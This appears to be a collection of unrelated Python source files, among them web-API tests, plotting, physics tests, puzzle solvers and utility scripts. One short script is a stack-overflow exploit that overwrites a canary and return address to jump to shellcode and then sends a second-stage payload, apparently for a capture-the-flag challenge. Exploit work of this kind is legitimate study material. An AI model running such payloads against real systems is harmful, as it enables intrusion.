"checkout": "2020-01-22",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Invaild check-in date"
create_order_mock.assert_not_called()
def test_cannot_order_hotel_room_with_checkout_after_conference(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-02",
"checkout": "2020-01-22",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Invaild check-out date"
create_order_mock.assert_not_called()
def test_cannot_order_hotel_room_with_checkout_before_the_checkin(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-03",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Invaild check-out date"
create_order_mock.assert_not_called()
def test_cannot_order_room_with_random_room_id(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
hotel_room_factory(conference=conference)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": "94990540",
"checkin": "2020-01-05",
"checkout": "2020-01-03",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Room 94990540 not found"
create_order_mock.assert_not_called()
def test_cannot_order_sold_out_room(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(conference=conference, total_capacity=0)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-03",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == f"Room {room.id} is sold out"
create_order_mock.assert_not_called()
def test_cannot_order_room_of_a_different_conference(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
room = hotel_room_factory(total_capacity=5)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-03",
}
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == f"Room {room.id} not found"
create_order_mock.assert_not_called()
def test_cannot_buy_more_room_than_available(
graphql_client, hotel_room_factory, user, conference_factory, mocker
):
graphql_client.force_login(user)
create_order_mock = mocker.patch("api.orders.mutations.create_order")
create_order_mock.return_value.payment_url = "https://example.com"
create_order_mock.return_value.code = "123"
conference = conference_factory(
start=timezone.make_aware(timezone.datetime(2020, 1, 1)),
end=timezone.make_aware(timezone.datetime(2020, 1, 10)),
)
room = hotel_room_factory(conference=conference, total_capacity=2)
response = graphql_client.query(
"""mutation CreateOrder($code: String!, $input: CreateOrderInput!) {
createOrder(conference: $code, input: $input) {
__typename
... on CreateOrderResult {
paymentUrl
}
... on Error {
message
}
}
}""",
variables={
"code": conference.code,
"input": {
"tickets": [],
"paymentProvider": "stripe",
"email": "[email protected]",
"hotelRooms": [
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-06",
},
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-06",
},
{
"roomId": str(room.id),
"checkin": "2020-01-05",
"checkout": "2020-01-06",
},
],
"invoiceInformation": {
"isBusiness": False,
"company": "",
"name": "Patrick",
"street": "",
"zipcode": "92100",
"city": "Avellino",
"country": "IT",
"vatId": "",
"fiscalCode": "",
},
"locale": "en",
},
},
)
assert not response.get("errors")
assert response["data"]["createOrder"]["__typename"] == "Error"
assert response["data"]["createOrder"]["message"] == "Too many rooms"
create_order_mock.assert_not_called()
| python |
import io
import cv2
import fs
import fs.memoryfs
import numpy as np
import matplotlib.pyplot as plt
class ramp4():
"""
INTRODUCTION
------------
    A simple library to make mp4 movies with matplotlib.pyplot. It uses RAM instead of disk storage for the temporary images.
HOW TO USE
-----------
1) Get an instance of ramp4.
2) Add image with matplotlib using the 'add' method.
3) Render the movie using the 'render' method.
4) Done
"""
def __init__(self):
self.cpt = 1
self.mem = fs.memoryfs.MemoryFS()
def add(self, figure=None, dpi=150):
"""
        Add the next frame to the movie. The image has to be generated beforehand with matplotlib.pyplot, either through the pyplot interface or the OOP interface.
        Parameters:
        -----------
        figure : None or matplotlib.pyplot.figure
            If the matplotlib OOP interface is used, pass the figure object in this parameter.
            If None is provided, pyplot's 'plt.savefig' will be used to get the bytes of the image.
            Choose according to how matplotlib is used.
dpi : int
The pixel density of the image. Should be a positive integer.
"""
buf = io.BytesIO()
if figure is None:
plt.savefig(buf, format="jpg", dpi=dpi)
else:
figure.savefig(buf, format="jpg", dpi=dpi)
buf.seek(0)
self.mem.writebytes("{:0>25}".format(self.cpt), buf.read())
self.cpt += 1
def render(self, outfile="movie.mp4", fps=20, close=True):
"""
Render the final movie and save it.
Parameters:
-----------
outfile : string
The path and name of the movie. The extension should be 'mp4'.
fps : int
Frames per second. Should be a positive integer.
close : bool
If True, close the RAM filesystem after rendering.
"""
images = self.mem.listdir(".")
height, width, _ = self.bytes2img(self.mem.getbytes(images[0])).shape
        movie = cv2.VideoWriter(outfile, cv2.VideoWriter_fourcc(*'mp4v'), fps, (width, height))
for image in images:
print("{0} / {1}".format(int(image), len(images)))
movie.write(self.bytes2img(self.mem.getbytes(image)))
        movie.release()
        cv2.destroyAllWindows()
if close:
self.close()
def close(self):
"""
Close the RAM filesystem.
"""
self.mem.close()
@staticmethod
def bytes2img(bytes):
"""Convert a bytes image to openCV image.
Parameters:
-----------
bytes : bytes
Input containing the image bytes.
"""
return cv2.imdecode(np.frombuffer(bytes, dtype='uint8'), cv2.IMREAD_UNCHANGED)
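if __name__ == "__main__":
    # Minimal demo following the docstring's workflow; the plotted content is arbitrary.
    movie = ramp4()
    for i in range(10):
        plt.plot([0, 1], [0, i])
        movie.add(dpi=100)
        plt.clf()
    movie.render("demo.mp4", fps=5)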
| python |
# Column configuration for a generic table renderer. Each entry defines a column's
# bound field, header title, visibility, a cell template ('tpl', whose {placeholders}
# are filled from 'kwargs'), and extra HTML attributes. Values starting with '@'
# appear to be substituted with the corresponding attribute of the row object.
table_config = [
{
'field': None,
        'title': 'Select',
'display': True,
'text':
{
'tpl': '<input type="checkbox" value="{n1}" />',
'kwargs':
{
'n1': '@id',
}
},
'attrs':
{
'nid': '@id',
}
},
{
'field': 'id',
'title': 'ID',
'display': False,
'text':
{
'tpl': '{n1}',
'kwargs':
{
'n1': '@id',
}
},
'attrs':
{
'k1': '@id',
'k2': 'v2',
}
},
{
'field': 'name',
        'title': 'Server Room',
'display': True,
'text':
{
'tpl': '{n1}',
'kwargs':
{
'n1': '@name',
}
},
'attrs': {
'name': 'name',
'origin': '@name',
'edit-enable': 'true',
},
},
{
'field': 'floor',
        'title': 'Floor',
'display': True,
'text':
{
'tpl': '{n1}',
'kwargs':
{
'n1': '@floor',
}
},
'attrs': {
'name': 'floor',
'origin': '@floor',
'edit-enable': 'true',
},
},
{
'field': None,
        'title': 'Actions',
'display': True,
'text':
{
'tpl': "<a href='/del?nid={nid}'>删除</a>",
'kwargs':
{
'nid': '@id',
}
},
'attrs':
{
'k1': '@id',
'k2': 'v2',
}
},
]
| python |
#!/usr/bin/python2
import sys
import time
fh = open(sys.argv[1], 'rb')
stage_2 = fh.read()
fh.close()
sploit = [
'\x00', '\x00', # r7
'\x30', '\x30', # r6
'\x31', '\x31', # r5
'\x32', '\x32', # r3
'\x34', '\x33', # r2
'\x34', '\x34', # r1
'\x00', '\x0A', # canary
'\x35', '\x35', # rbp
'\x02', '\x2E', # ret
'\x20', '\x00', # ret to shellcode
'\x20', '\x00', # arg0 to input_read
'\x04', '\x00', # arg1 to input_read
]
sploit = ''.join(sploit)
sys.stdout.write(sploit)
sys.stdout.flush()
time.sleep(1)
sys.stdout.write(stage_2)
sys.stdout.flush()
| python |
#!/usr/bin/python3
import cmath
import numpy as np
import pytest
from pytest import approx
from emtoolbox.tline.tline import TLine
from emtoolbox.tline.mtl_network import MtlNetwork
def pol2rect(mag, deg):
return cmath.rect(mag, np.deg2rad(deg))
@pytest.mark.parametrize(
"f",
[
5e6,
np.array([5e6]),
np.array([5e6, 5e6]),
np.array([5e6, 5e6, 5e6]),
],
)
def test_network1_simple(f):
# Paul MTL P6.3
vp = 3e8
zc = 50
zs = 20 - 30j
zl = 200 + 500j
length = 78
tline = TLine.create_lowloss(zc, freq=f, vp=vp, length=length)
network = MtlNetwork(tline, zs, zl)
assert tline.n_wavelengths() == approx(1.3, rel=0.001)
assert network.reflection() == approx(pol2rect(0.9338, 9.866), rel=0.001)
assert network.reflection(0) == approx(pol2rect(0.9338, 153.9), rel=0.001)
assert network.input_impedance() == approx(pol2rect(11.73, 81.16), rel=0.001)
@pytest.mark.parametrize(
"f",
[
5e6,
np.array([5e6]),
np.array([5e6, 5e6]),
np.array([5e6, 5e6, 5e6]),
],
)
def test_network1_solve(f):
# Paul MTL P6.3
vp = 3e8
zc = 50
zs = 20 - 30j
zl = 200 + 500j
length = 78
vs = 50
tline = TLine.create_lowloss(zc, freq=f, vp=vp, length=length)
network = MtlNetwork(tline, zs, zl)
sol = network.solve(vs)
assert network.get_voltage(sol, 0) == approx(pol2rect(20.55, 121.3), rel=0.001)
assert network.get_voltage(sol, length) == approx(pol2rect(89.6, -50.45), rel=0.001)
assert network.vswr() == approx(29.21, rel=0.001)
@pytest.mark.parametrize(
"zl, result",
[
(50, 1.0),
(100, 2.0),
(10, 5.0),
(0, np.inf)
],
)
def test_vswr(zl, result):
zc = 50
zs = 50
tline = TLine.create_lowloss(zc)
network = MtlNetwork(tline, zs, zl)
assert network.vswr() == approx(result, rel=0.001)
| python |
# Section 10.8.1 snippets
# 10.8.1 Base Class CommissionEmployee
# Testing Class CommissionEmployee
from commissionemployee import CommissionEmployee
from decimal import Decimal
c = CommissionEmployee('Sue', 'Jones', '333-33-3333',
Decimal('10000.00'), Decimal('0.06'))
c
print(f'{c.earnings():,.2f}')
c.gross_sales = Decimal('20000.00')
c.commission_rate = Decimal('0.1')
print(f'{c.earnings():,.2f}')
# 10.8.2 Subclass SalariedCommissionEmployee
# Testing Class SalariedCommissionEmployee
from salariedcommissionemployee import SalariedCommissionEmployee
s = SalariedCommissionEmployee('Bob', 'Lewis', '444-44-4444',
Decimal('5000.00'), Decimal('0.04'), Decimal('300.00'))
print(s.first_name, s.last_name, s.ssn, s.gross_sales,
s.commission_rate, s.base_salary)
print(f'{s.earnings():,.2f}')
s.gross_sales = Decimal('10000.00')
s.commission_rate = Decimal('0.05')
s.base_salary = Decimal('1000.00')
print(s)
print(f'{s.earnings():,.2f}')
# Testing the "is a" Relationship
issubclass(SalariedCommissionEmployee, CommissionEmployee)
isinstance(s, CommissionEmployee)
isinstance(s, SalariedCommissionEmployee)
# Processing CommissionEmployees and SalariedCommissionEmployees Polymorphically
employees = [c, s]
for employee in employees:
print(employee)
print(f'{employee.earnings():,.2f}\n')
##########################################################################
# (C) Copyright 2019 by Deitel & Associates, Inc. and #
# Pearson Education, Inc. All Rights Reserved. #
# #
# DISCLAIMER: The authors and publisher of this book have used their #
# best efforts in preparing the book. These efforts include the #
# development, research, and testing of the theories and programs #
# to determine their effectiveness. The authors and publisher make #
# no warranty of any kind, expressed or implied, with regard to these #
# programs or to the documentation contained in these books. The authors #
# and publisher shall not be liable in any event for incidental or #
# consequential damages in connection with, or arising out of, the #
# furnishing, performance, or use of these programs. #
##########################################################################
| python |
"""
solution AdventOfCode 2019 day 20 part 2.
https://adventofcode.com/2019/day/20.
author: pca
"""
from general.general import read_file, get_location_input_files, measure
import matplotlib.pyplot as plt
from collections import Counter
import networkx as nx
import heapq
def to_grid(grid_txt):
grid = dict()
for y, line in enumerate(grid_txt):
for x, ch in enumerate(line):
grid[(y, x)] = ch
return grid
def node_distances(grid, node_positions, start_node):
deltas = [(-1, 0), (1, 0), (0, -1), (0, 1)]
visited = set()
q = list()
q.append((0, start_node))
while len(q) > 0:
d, (y, x) = q.pop(0)
if (y, x) in visited:
continue
visited.add((y, x))
# at a node with a code?
if (y, x) in node_positions:
yield d, (y, x)
# neighbours
for dy, dx in deltas:
if grid[(y + dy, x + dx)] == '.':
q.append((d + 1, (y + dy, x + dx)))
def all_distances(nodes, grid):
distances = dict()
node_codes = set()
for node_from in nodes.keys():
for (d, node_to) in node_distances(grid, nodes.keys(), node_from):
node_code_from = nodes[node_from]
node_code_to = nodes[node_to]
if node_code_to != node_code_from:
distances[(node_code_from, node_code_to)] = d
node_codes.add(node_code_from)
# setup the portals
for node_code, idx in node_codes:
if idx == 1:
distances[(node_code, -1), (node_code, 1)] = 1
distances[(node_code, 1), (node_code, -1)] = 1
return distances, node_codes
def read_nodes(grid):
deltas = [((-2, 0), (-1, 0)), ((1, 0), (2, 0)), ((0, -2), (0, -1)), ((0, 1), (0, 2))]
node_counter = Counter()
nodes_positions = dict()
# check for each grid location if it's a node.
# nodes neighbour a capital letter.
for y, x in grid:
if grid[(y, x)] == '.':
for ((dy1, dx1), (dy2, dx2)) in deltas:
ch1 = grid[(y + dy1, x + dx1)]
ch2 = grid[(y + dy2, x + dx2)]
if ch1.isupper() and ch2.isupper():
node_str = ch1 + ch2
# check if it's an outer gate
is_on_edge = (y == 2) or (x == 2) or (y, x + 3) not in grid or (y + 3, x) not in grid
if node_str in ('AA', 'ZZ'):
idx = 0
elif is_on_edge:
idx = 1
else:
idx = -1
nodes_positions[(y, x)] = (node_str, idx)
return nodes_positions
def solve(G):
frontier = list()
visited = set()
heapq.heappush(frontier, (0, -1, ('AA', 0), [(('AA', 0), 0)]))
while len(frontier) > 0:
dimension, total_distance, node, path = heapq.heappop(frontier)
if dimension < 0:
continue
if node in [('AA', 0), ('ZZ', 0)] and dimension != 0:
continue
if node == ('ZZ', 0) and dimension == 0:
print(f"found: {total_distance}")
return True, total_distance, path
if (dimension, node) in visited:
continue
visited.add((dimension, node))
# we always go to the other side of the node
node_code, node_delta = node
check_node = node_code, -node_delta
for neighbour in G.neighbors(check_node):
neighbour_code, neighbour_delta = neighbour
# make sure we don't go back right away on the same node.
if node_code != neighbour_code:
# count for movement to another dimension as well (+1).
distance = G.edges[(check_node, neighbour)]['weight'] + 1
delta_dimension = -node_delta
heapq.heappush(frontier, (dimension + delta_dimension, total_distance + distance, neighbour,
path + [(neighbour, dimension + delta_dimension)]))
return False, None, None
@measure
def main(args=None):
grid_txt = read_file(get_location_input_files(), 'input_day20.txt')
grid = to_grid(grid_txt)
nodes = read_nodes(grid)
distances, node_codes = all_distances(nodes, grid)
G = nx.Graph()
G.add_weighted_edges_from([(k[0], k[1], v) for k,v in distances.items()])
# draw graph
positions = {v: k for k, v in nodes.items()}
plt.figure(1, figsize=(12, 12))
nx.draw_networkx(G, node_size=50, pos=positions, with_labels=True, font_size=8, alpha=0.5)
plt.show()
res, total_distance, path = solve(G)
print(f"Total distance: {total_distance}")
if __name__ == "__main__":
main()
| python |
#!/usr/bin/env python
# encoding: utf-8
from maze import Maze
from RL_brain import SarsaLambdaTable, QLambdaTable
import numpy as np
METHOD = "QLambda"
def get_action(q_table, state):
    state_action = q_table.loc[state, :]
state_action_max = state_action.max()
idxs = []
for max_item in range(len(state_action)):
if state_action[max_item] == state_action_max:
idxs.append(max_item)
sorted(idxs)
return tuple(idxs)
def get_policy(q_table, rows=5, cols=5, pixels=40, origin=20):
    # the maze grid is 5x5 (see the reshape in update()); each cell is 40px with a 20px origin offset
    policy = []
    for i in range(rows):
        for j in range(cols):
            item_center_x, item_center_y = (j * pixels + origin), (i * pixels + origin)
item_state = [item_center_x - 15.0, item_center_y - 15.0, item_center_x + 15.0, item_center_y + 15.0]
# If the current state is each terminated state, the value is -1
if item_state in [env.canvas.coords(env.hell1), env.canvas.coords(env.hell2),
env.canvas.coords(env.hell3), env.canvas.coords(env.hell4), env.canvas.coords(env.oval)]:
policy.append(-1)
continue
if str(item_state) not in q_table.index:
policy.append((0, 1, 2, 3))
continue
item_action_max = get_action(q_table, str(item_state))
policy.append(item_action_max)
return policy
def judge(observation):
'''
Determine whether the current state is in the secondary air duct
:param observation: current state
:return:
'''
x = (observation[0] + observation[2]) / 2
# When the x is 140, it is a duct
if x == 140:
return True
return False
def update():
for episode in range(1000):
observation = env.reset()
# Select behavior based on current state
action = RL.choose_action(str(observation))
# Initialize all eligibility_trace to 0
RL.eligibility_trace *= 0
while True:
env.render()
            # In the game, the secondary wind pushes the agent up two squares.
            # Check whether the current state is in the secondary air duct and the chosen action is an upward move
if judge(observation) and action == 0:
observation_, reward, done, oval_flag = env.step(action)
# If the termination state occurs during the process, it ends directly
if done:
break
# Direct assignment is continued upwards, and reward add
action_ = 0
reward = 0.1
RL.learn(str(observation), action, reward, str(observation_), action_)
observation = observation_
action = action_
# Take action from the current state to get the observation_, reward, done, oval_flag
observation_, reward, done, oval_flag = env.step(action)
# Based on the next state selection behavior
action_ = RL.choose_action(str(observation_))
            # Special-case moving down inside the wind tunnel when not in a trap (prevents riding the tunnel back up to farm reward)
if judge(observation) and action == 1:
reward = -0.1
RL.learn(str(observation), action, reward, str(observation_), action_)
observation = observation_
action = action_
if done:
break
print('Game Over')
q_table_result = RL.q_table
policy = get_policy(q_table_result)
print("The optimal strategy is", end=":")
print(policy)
print("Draw Policy", end=":")
policy_result = np.array(policy).reshape(5, 5)
print(policy_result)
print("Drawing path: ")
env.render_by_policy(policy_result)
if __name__ == "__main__":
env = Maze()
RL = SarsaLambdaTable(actions=list(range(env.n_actions)))
if METHOD == "QLambda":
RL = QLambdaTable(actions=list(range(env.n_actions)))
env.after(100, update)
env.mainloop()
| python |
from abc import ABC, abstractmethod
from datetime import datetime
from typing import List
from dateutil.tz import tz
from pytz import timezone
from dataclasses import dataclass
from importlib import import_module
from .constant import Interval, Exchange
from .object import BarData, TickData
from .setting import SETTINGS
DB_TZ = timezone(SETTINGS["database.timezone"])
# use this tz in datetime tzinfo, remove 6min problem
DATETIME_TZ = tz.gettz('Asia/Shanghai')
def convert_tz(dt: datetime) -> datetime:
"""
Convert timezone of datetime object to DB_TZ.
"""
dt = dt.astimezone(DB_TZ)
return dt.replace(tzinfo=None)
@dataclass
class BarOverview:
"""
Overview of bar data stored in database.
"""
symbol: str = ""
exchange: Exchange = None
interval: Interval = None
count: int = 0
start: datetime = None
end: datetime = None
class BaseDatabase(ABC):
"""
Abstract database class for connecting to different database.
"""
@abstractmethod
def save_bar_data(self, bars: List[BarData]) -> bool:
"""
Save bar data into database.
"""
pass
@abstractmethod
def save_tick_data(self, ticks: List[TickData]) -> bool:
"""
Save tick data into database.
"""
pass
@abstractmethod
def load_bar_data(
self,
symbol: str,
exchange: Exchange,
interval: Interval,
start: datetime,
end: datetime
) -> List[BarData]:
"""
Load bar data from database.
"""
pass
@abstractmethod
def load_tick_data(
self,
symbol: str,
exchange: Exchange,
start: datetime,
end: datetime
) -> List[TickData]:
"""
Load tick data from database.
"""
pass
@abstractmethod
def delete_bar_data(
self,
symbol: str,
exchange: Exchange,
interval: Interval
) -> int:
"""
Delete all bar data with given symbol + exchange + interval.
"""
pass
@abstractmethod
def delete_tick_data(
self,
symbol: str,
exchange: Exchange
) -> int:
"""
Delete all tick data with given symbol + exchange.
"""
pass
@abstractmethod
def get_bar_overview(self) -> List[BarOverview]:
"""
        Return an overview of the bar data available in the database.
"""
pass
database: BaseDatabase = None
def get_database() -> BaseDatabase:
""""""
# Return database object if already inited
global database
if database:
return database
# Read database related global setting
database_name: str = SETTINGS["database.name"]
module_name: str = f"vnpy_{database_name}"
# Try to import database module
try:
module = import_module(module_name)
except ModuleNotFoundError:
print(f"找不到数据库驱动{module_name},使用默认的SQLite数据库")
module = import_module("vnpy_sqlite")
# Create database object from module
database = module.Database()
return database
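# Example (which driver loads depends on SETTINGS and the installed vnpy_* packages):
# db = get_database()
# overviews = db.get_bar_overview()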
| python |
import os
import requests
import subprocess
import wget
import zipfile
def download_latest_version(version_number, driver_directory):
"""Download latest version of chromedriver to a specified directory.
:param driver_directory: Directory to save and download chromedriver.exe into.
:type driver_directory: str
:param version_number: Latest chromedriver release from chromedriver.storage.googleapis.com.
:type version_number: str
:return: None
"""
print("Attempting to download latest driver online......")
download_url = "https://chromedriver.storage.googleapis.com/" + version_number + "/chromedriver_win32.zip"
print(download_url)
# Download driver as a zip file to specified folder
latest_driver_zip = wget.download(download_url, out=driver_directory)
# Read zip file
with zipfile.ZipFile(latest_driver_zip, 'r') as downloaded_zip:
# Extract contents from downloaded zip file to specified folder path
downloaded_zip.extractall(path=driver_directory)
print(f"\nSuccessfully downloaded version {version_number} to:\n{driver_directory}")
# Delete the zip file downloaded
os.remove(latest_driver_zip)
return
def check_driver(driver_directory):
"""Check local chromedriver version and compare it with latest available version online.
:param driver_directory: Directory to store chromedriver.exe. Required to add driver_directory to path before using.
:type driver_directory: str
:return: True if chromedriver.exe is already in driver_directory, else chromedriver is automatically downloaded.
"""
# Check for latest chromedriver version online
latest_release_url = "https://chromedriver.storage.googleapis.com/LATEST_RELEASE"
response = requests.get(latest_release_url)
online_driver_version = response.text
try:
# Executes cmd line entry to check for existing web-driver version locally
cmd_run = subprocess.run("chromedriver --version",
capture_output=True,
text=True)
except FileNotFoundError:
# Handling case if chromedriver not found in path
print("No chromedriver.exe found in specified path\n")
download_latest_version(online_driver_version, driver_directory)
else:
# Extract local driver version number as string from terminal output
local_driver_version = cmd_run.stdout.split()[1]
print(f"Local chromedriver version: {local_driver_version}")
print(f"Latest online chromedriver version: {online_driver_version}")
if local_driver_version == online_driver_version:
return True
else:
download_latest_version(online_driver_version, driver_directory)
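if __name__ == "__main__":
    # Example: keep a chromedriver copy in the current directory up to date
    # (the directory is an assumption; any writable folder on PATH works).
    check_driver(".")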
| python |
"""
Given an array, return the max difference between
2 numbers in array whereby:
- larger number is after smaller number in array order
eg: [0, 1, 12] -> 12
eg: [12, 0, 1] -> 1
"""
def maxDiff(arr, n):
# Initialize Result
maxDiff = -1
# Initialize max element from
# right side
maxRight = arr[n - 1]
for i in range(n - 2, -1, -1):
if arr[i] > maxRight:
maxRight = arr[i]
else:
diff = maxRight - arr[i]
if diff > maxDiff:
maxDiff = diff
return maxDiff
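# Quick sanity checks matching the docstring examples:
if __name__ == '__main__':
    assert maxDiff([0, 1, 12], 3) == 12
    assert maxDiff([12, 0, 1], 3) == 1
    assert maxDiff([5, 4, 3], 3) == -1  # no larger number appears after a smaller one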
| python |
from datetime import datetime
import dill as pickle
from pathlib import Path
from copy import deepcopy
import numpy as np
from skimage.io import imread
import GPnd
from GPnd import *
from plotting import MAP_Estimator
if __name__=='__main__':
f_path = Path('chains/2019-09-22T16-01-08_n100000.pkl')
with open(f_path, 'rb') as f:
chain = pickle.load(f)
image_path = Path('data/head.png')
image = dataLoading.import_image(image_path, size=chain.size)
data = chain.T(image)
fbp = chain.T.inv(data)
print(f_path)
print(
'Data Shape: %s\n'%(data.shape,),
'L_2 Errors: \n',
' Filtered Back projections: %s\n'%(np.linalg.norm(fbp-image)/np.product(image.shape),),
' MCMC Reconstruction: %s\n'%(np.linalg.norm(chain.reconstruction-image)/np.product(image.shape)),
) | python |
# encoding=utf8
# pylint: disable=line-too-long
"""Implementation of modified nature-inspired algorithms."""
from NiaPy.algorithms.modified.hba import HybridBatAlgorithm
from NiaPy.algorithms.modified.hde import DifferentialEvolutionMTS, DifferentialEvolutionMTSv1, DynNpDifferentialEvolutionMTS, DynNpDifferentialEvolutionMTSv1, MultiStratgyDifferentialEvolutionMTS, DynNpMultiStrategyDifferentialEvolutionMTS, DynNpMultiStrategyDifferentialEvolutionMTSv1, MultiStratgyDifferentialEvolutionMTSv1
from NiaPy.algorithms.modified.jde import SelfAdaptiveDifferentialEvolution, DynNpSelfAdaptiveDifferentialEvolutionAlgorithm, MultiStrategySelfAdaptiveDifferentialEvolution, DynNpMultiStrategySelfAdaptiveDifferentialEvolution
__all__ = [
'HybridBatAlgorithm',
'DifferentialEvolutionMTS',
'DifferentialEvolutionMTSv1',
'DynNpDifferentialEvolutionMTS',
'DynNpDifferentialEvolutionMTSv1',
'MultiStratgyDifferentialEvolutionMTS',
'MultiStratgyDifferentialEvolutionMTSv1',
'DynNpMultiStrategyDifferentialEvolutionMTS',
'DynNpMultiStrategyDifferentialEvolutionMTSv1',
'SelfAdaptiveDifferentialEvolution',
'DynNpSelfAdaptiveDifferentialEvolutionAlgorithm',
'MultiStrategySelfAdaptiveDifferentialEvolution',
'DynNpMultiStrategySelfAdaptiveDifferentialEvolution'
]
| python |
from __future__ import annotations
from typing import Any, TypeVar, cast
from discord.ext import typed_commands
C = TypeVar('C', bound='Cog[Any]')
CT = TypeVar('CT', bound=typed_commands.Context)
class Cog(typed_commands.Cog[CT]):
def _inject(self: C, bot: typed_commands.Bot[CT], /) -> C:
self.__pre_inject__(bot)
cog: C = cast(Any, super())._inject(bot)
self.__post_inject__(bot)
return cog
def _eject(self, bot: typed_commands.Bot[CT], /) -> None:
self.__pre_eject__(bot)
cast(Any, super())._eject(bot)
self.__post_eject__(bot)
def __pre_inject__(self, bot: typed_commands.Bot[CT], /) -> None:
...
def __post_inject__(self, bot: typed_commands.Bot[CT], /) -> None:
...
def __pre_eject__(self, bot: typed_commands.Bot[CT], /) -> None:
...
def __post_eject__(self, bot: typed_commands.Bot[CT], /) -> None:
...
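# Sketch of a concrete cog overriding the lifecycle hooks (names are illustrative):
# class MyCog(Cog[typed_commands.Context]):
#     def __post_inject__(self, bot: typed_commands.Bot[typed_commands.Context], /) -> None:
#         print('MyCog injected')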
| python |
import xlrd
import csv
def Excel2CSV(ExcelFile='SicCodesAllLevels.xls',
              SheetName='SIC4', CSVFile='ref_list.csv'):
    workbook = xlrd.open_workbook(ExcelFile)
    worksheet = workbook.sheet_by_name(SheetName)
